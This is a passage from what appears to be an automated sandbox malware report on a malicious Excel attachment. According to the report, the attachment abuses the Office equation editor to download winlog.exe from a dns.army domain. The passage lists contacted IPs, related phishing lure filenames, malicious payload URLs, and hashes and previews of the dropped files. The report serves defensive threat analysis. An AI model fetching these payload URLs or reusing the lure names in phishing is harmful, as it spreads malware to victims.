                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		low
                                                                                                                                                              http://ariadna.elmundo.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                		high

                                                                                                                                                                Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                103.140.251.164
                                                                                                                                                                		unknownViet Nam
                                                                                                                                                                		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNfalse
                                                                                                                                                                54.67.57.56
                                                                                                                                                                		unknownUnited States
                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                191.96.163.202
                                                                                                                                                                		unknownChile
                                                                                                                                                                		61317ASDETUKhttpwwwheficedcomGBtrue
                                                                                                                                                                52.57.196.177
                                                                                                                                                                		unknownUnited States
                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                104.21.61.250
                                                                                                                                                                		unknownUnited States
                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                103.251.44.218
                                                                                                                                                                		unknownIndonesia
                                                                                                                                                                		131775IDNIC-JALANET-AS-IDPTJupiterJalaArtaIDtrue

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                                Analysis ID:356571
                                                                                                                                                                Start date:23.02.2021
                                                                                                                                                                Start time:10:24:37
                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 10m 0s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Sample file name:QTN3C2AF414EDF9_041873.xlsx
                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • HDC enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.expl.evad.winXLSX@9/12@8/6
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HDC Information:
                                                                                                                                                                • Successful, ratio: 34.4% (good quality ratio 32.7%)
                                                                                                                                                                • Quality average: 72.5%
                                                                                                                                                                • Quality standard deviation: 29.1%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 84%
                                                                                                                                                                • Number of executed functions: 106
                                                                                                                                                                • Number of non-executed functions: 80
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Adjust boot time
                                                                                                                                                                • Enable AMSI
                                                                                                                                                                • Found application associated with file extension: .xlsx
                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                • Scroll down
                                                                                                                                                                • Close Viewer
                                                                                                                                                                Warnings:
                                                                                                                                                                Show All
                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                10:26:11API Interceptor76x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                                10:26:17API Interceptor34x Sleep call for process: vbc.exe modified
                                                                                                                                                                10:26:37API Interceptor212x Sleep call for process: ipconfig.exe modified
                                                                                                                                                                10:27:19API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                103.140.251.164quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestqw.dns.army/receipat/winlog.exe
                                                                                                                                                                HBL VRN0924588.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • thdyalgreenkeghethbm.dns.army/receipat/winlog.exe
                                                                                                                                                                Smart Tankers Qoute no. 2210.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestyc.dns.army/receipat/winlog.exe
                                                                                                                                                                MV SEIYO FORTUNE REF 27 - QUOTATION.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestak.dns.army/receipat/winlog.exe
                                                                                                                                                                INV-08974589.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestak.dns.army/receipat/winlog.exe
                                                                                                                                                                PO-098907654467.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestak.dns.army/receipat/winlog.exe
                                                                                                                                                                DOC_KDB_06790-80.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • wsdyalgreenkeghewsmq.dns.army/receipat/winlog.exe
                                                                                                                                                                DOC_1WE074665678654.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • wsdyalgreenkeghewsmq.dns.army/receipat/winlog.exe
                                                                                                                                                                2089876578 87687.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestdb.dns.army/receipat/winlog.exe
                                                                                                                                                                IN 20201125 PL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestdb.dns.army/receipat/winlog.exe
                                                                                                                                                                INV_TMB_C108976.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestdb.dns.army/receipat/winlog.exe
                                                                                                                                                                INV_TMB_210567Y00.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreensndykeghesnpw.dns.army/aledoc/winlog.exe
                                                                                                                                                                RF-E93-STD-068 SUPPLIES.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreensndykeghesnpw.dns.army/aledoc/winlog.exe
                                                                                                                                                                PE20-RQ- 1638.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedst.dns.navy/aledoc/winlog.exe
                                                                                                                                                                SHEXD201990876_SHIPPING_DOCUMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedst.dns.navy/aledoc/winlog.exe
                                                                                                                                                                2218003603 92390-00.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedst.dns.navy/aledoc/winlog.exe
                                                                                                                                                                inquiry10204168.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedah.dns.army/aledoc/winlog.exe
                                                                                                                                                                RFQ 41680.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedah.dns.army/aledoc/winlog.exe
                                                                                                                                                                RF-E68-STD-2020-106.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedah.dns.army/aledoc/winlog.exe
                                                                                                                                                                SCAN DOCS.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • bvcxzlkjhgfdsapoiuytrewqwertyuiopasdfghj.ydns.eu/invoice.doc
                                                                                                                                                                54.67.57.56MV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/dytF30rxT6o
                                                                                                                                                                #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/GNEu30rxT59
                                                                                                                                                                New_Message00934.htmGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/J9A830rbc9g
                                                                                                                                                                http://ht.ly/Q3Px30qXOOAGet hashmaliciousBrowse
                                                                                                                                                                • ht.ly/Q3Px30qXOOA
                                                                                                                                                                http://ow.ly/Rrh750jwUFvGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/Rrh750jwUFv
                                                                                                                                                                C72781002.pdfGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/pnzA30gASLt
                                                                                                                                                                http://ow.ly/F2zF30gk7FA?f$9fk45ft987hGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/F2zF30gk7FA?f$9fk45ft987h
                                                                                                                                                                NEW QUOTATION.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/5LIK30cNgLL
                                                                                                                                                                DHL_TRACKING_DETAILS_-_Copy.pdfGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/YFZ6w

                                                                                                                                                                Domains

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                algreenstdykeghestqw.dns.armyquotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.140.251.164
                                                                                                                                                                ow.lyMV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.62.204
                                                                                                                                                                BL + PL + CI.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                New_Message00934.htmGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                https://u17588438.ct.sendgrid.net/ls/click?upn=h-2Bj1pe3h4Ysprj-2F8RRf9ChxAthv8oUCYMnydAOiqdZUW-2BWPjSW0-2FEf5GesIstZyF0TVG_lbRSzjTjAOmWKCI6GhhOife1Jj1xtmqeANf3i3jW3opERdKAfB6RW1d9S3-2BY3uAZ73G93x4NRv3SGU9GC4XSs1eCeVJJbjnXgiEyfnLUrO5zxeR-2BpWFMutEFdboHQGx95igAqkR70Vu4Hiwd9NcrDdrJs-2BOivQ93TFqP-2BT4HPMkXW0NLxBKQVPvAgnXNChoww1TXGQN2qsuqwn8GkbQaq3PqNM7QYH3v-2Fv5T56RWSqXIWExu7REiKCcAp9f6Du8yGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                https://u18021447.ct.sendgrid.net/ls/click?upn=4-2B97j-2BtYQoCI2fDYEybJE8VXu-2FoT5KUlTEBIP-2FZpwja1LaUJU-2BvsibdvO6vqoNKGEtLN_tkuwbiJYWhKaepE-2BM1TZDajlOQqjy023dIArdFfY4Q7aInX1fHyzMaSNgDpN4RXFFT28Nvm4lTgRP2Lo2wigkcpLbULWR3rg-2FE60qFalXBd1XauXGfqffZ3Vso2GpH8M2RIy-2BLstJ0DTX5Ex-2FSV3rlGx9ZgW98jLaWYfY9EKxp-2Bb-2FdkzvrNyt500LWgC9ORMQ0r6YfW8Y79Zk2VNJnudzlxb1CJo-2FW7Zs6eo8A-2FWgzs-3DGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.62.204
                                                                                                                                                                http://ow.ly/nDiV30mD63nGet hashmaliciousBrowse
                                                                                                                                                                • 54.183.132.164
                                                                                                                                                                http://ow.ly/Rrh750jwUFvGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                GTEDS.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                GTEDS.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.183.130.144
                                                                                                                                                                Marine Engine Spare Parts Order_first.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                CCS Projects.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.183.132.164
                                                                                                                                                                http://ow.ly/8rYF30jYWv5Get hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                Locked.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.183.131.91
                                                                                                                                                                http://ow.ly/avIT30jzSjvGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                9a835a425c8321c22d5a751078cb5f020abaaaafe7cf80fee68237d0811fcae.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.183.130.144
                                                                                                                                                                http://ow.ly/4mh330j3SCOGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                ACHIEVE-1 CONTRACT.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.62.204
                                                                                                                                                                oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.comG6FkfjX5Ow.exeGet hashmaliciousBrowse
                                                                                                                                                                • 18.195.132.44

                                                                                                                                                                ASN

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                AMAZON-02USMV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                8TD8GfTtaW.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.192.141.1
                                                                                                                                                                R4VugGhHOo.exeGet hashmaliciousBrowse
                                                                                                                                                                • 18.197.52.125
                                                                                                                                                                RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 52.58.78.16
                                                                                                                                                                ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                                                                                                • 13.57.130.120
                                                                                                                                                                22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 35.158.240.78
                                                                                                                                                                ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.62.204
                                                                                                                                                                BL + PL + CI.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                FortPlayerInstaller.exeGet hashmaliciousBrowse
                                                                                                                                                                • 13.224.94.78
                                                                                                                                                                RGB HeroInstaller.exeGet hashmaliciousBrowse
                                                                                                                                                                • 99.86.159.18
                                                                                                                                                                Buff-Installer.exeGet hashmaliciousBrowse
                                                                                                                                                                • 13.224.195.128
                                                                                                                                                                PO_210222.exeGet hashmaliciousBrowse
                                                                                                                                                                • 52.58.78.16
                                                                                                                                                                Order83930.exeGet hashmaliciousBrowse
                                                                                                                                                                • 3.131.252.17
                                                                                                                                                                rieuro.dllGet hashmaliciousBrowse
                                                                                                                                                                • 143.204.4.74
                                                                                                                                                                AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 52.213.114.86
                                                                                                                                                                document-1915351743.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 143.204.4.74
                                                                                                                                                                X1(1).xlsmGet hashmaliciousBrowse
                                                                                                                                                                • 99.86.159.123
                                                                                                                                                                wsXYadCYsE.pkgGet hashmaliciousBrowse
                                                                                                                                                                • 52.216.242.12
                                                                                                                                                                ASDETUKhttpwwwheficedcomGBProforma invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                DnHeI10lQ6.exeGet hashmaliciousBrowse
                                                                                                                                                                • 191.101.50.30
                                                                                                                                                                Mortgage Description.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.221.66.18
                                                                                                                                                                35HFM7BNtD.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.150.67.133
                                                                                                                                                                QwLijaR9ex.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.150.67.133
                                                                                                                                                                order_list_fe99087.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 45.150.67.133
                                                                                                                                                                516783.PO.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 45.150.67.133
                                                                                                                                                                RFQ# 02012021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                QRN-CLJC-06112020149.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                RFQ#212021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                RFQ #28012021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                Req for Quote.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                RFQ.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                JANUARY QUOTATION FOR PRODUCT ORDER 02983H G FOR Goldolphin INDUSTRIES LTD PACKING LIST FOR 60MM.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.221.66.154
                                                                                                                                                                ACH Remittance Details.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.142.116
                                                                                                                                                                ACH Remittance Details.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.142.116
                                                                                                                                                                ACH Remittance Details.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.142.116
                                                                                                                                                                BFSV-1F(N)_1B-8B_ANSI.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.138.49.96
                                                                                                                                                                ts1593782194000000.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.138.49.96
                                                                                                                                                                https://mysp.ac/WJKWebxcAX/../4lj3C#fCfAXmrBDFsvHupFQHQULbmkQvYGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.121.98
                                                                                                                                                                VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNMV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.120
                                                                                                                                                                TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.133.108.6
                                                                                                                                                                SKBMT_ 5870Z904_ Image.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.149
                                                                                                                                                                FedEx Shipment 427781339903.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.151.123.132
                                                                                                                                                                BL + PL + CI.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.121
                                                                                                                                                                Our New Order Feb 23 2021 at 2.70_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                Request for Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.89.88.238
                                                                                                                                                                #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.145
                                                                                                                                                                quote.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.89.88.238
                                                                                                                                                                Our New Order Feb 22 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.128
                                                                                                                                                                quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.140.251.164
                                                                                                                                                                notice of arrival.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.147.184.10
                                                                                                                                                                22-2-2021 .xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.118
                                                                                                                                                                Shipping_Document.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.119
                                                                                                                                                                Remittance copy.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.145
                                                                                                                                                                CI + PL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.121
                                                                                                                                                                RFQ_Enquiry_0002379_.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.117

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                No context

                                                                                                                                                                Dropped Files

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dlllpdKSOB78u.exeGet hashmaliciousBrowse
                                                                                                                                                                  jTmBvrBw7V.exeGet hashmaliciousBrowse
                                                                                                                                                                    523JHfbGM1.exeGet hashmaliciousBrowse
                                                                                                                                                                      TAk8jeG5ob.exeGet hashmaliciousBrowse
                                                                                                                                                                        PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                                                                                                                          ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                                            Orderoffer.exeGet hashmaliciousBrowse
                                                                                                                                                                              Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                INV_PR2201.docmGet hashmaliciousBrowse
                                                                                                                                                                                  CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                                                                                                                                                                                    Request for Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                      #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                        Purchase Order___pdf ____________.exeGet hashmaliciousBrowse
                                                                                                                                                                                          quote.exeGet hashmaliciousBrowse
                                                                                                                                                                                            Order83930.exeGet hashmaliciousBrowse
                                                                                                                                                                                              Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                                                                                                                                                                                Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  GPP.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    OrderSuppliesQuote0817916.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      ACCOUNT DETAILS.exeGet hashmaliciousBrowse

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]
                                                                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):217624
                                                                                                                                                                                                        Entropy (8bit):7.895818449493941
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:611QTAGoul3imDxtHYB19DyzSFSxuPmxF0y:xAjul3i+xlK19JGuOUy
                                                                                                                                                                                                        MD5:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        SHA1:32FDCC2E0BCFC476347078D7EA05F12D5A259BEA
                                                                                                                                                                                                        SHA-256:38B6A40D2EEDDF38695294C57971FC2EFAB81FEA95100260A2003BAA13616B83
                                                                                                                                                                                                        SHA-512:B8312043058B28C0EEDE079425D785B581AABEAE63C889DDC4382FAA2B070333FC8A6E76F7810678CB9AE96B9E52D6E48604CEF9417C565C97C0FAADFE36B953
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        IE Cache URL:http://algreenstdykeghestqw.dns.army/receipat/winlog.exe?platform=hootsuite
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@.......................................@.................................D...........|............................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...XU...........~..............@....ndata...................................rsrc...|...........................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CFA2F95.jpeg
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48770
                                                                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D657FE6.png
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):111378
                                                                                                                                                                                                        Entropy (8bit):7.963743447431302
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                                                                                                                                                                        MD5:5ACDB72AF63832D23CED937B6B976471
                                                                                                                                                                                                        SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                                                                                                                                                                        SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                                                                                                                                                                        SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC9322AF.jpeg
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48770
                                                                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
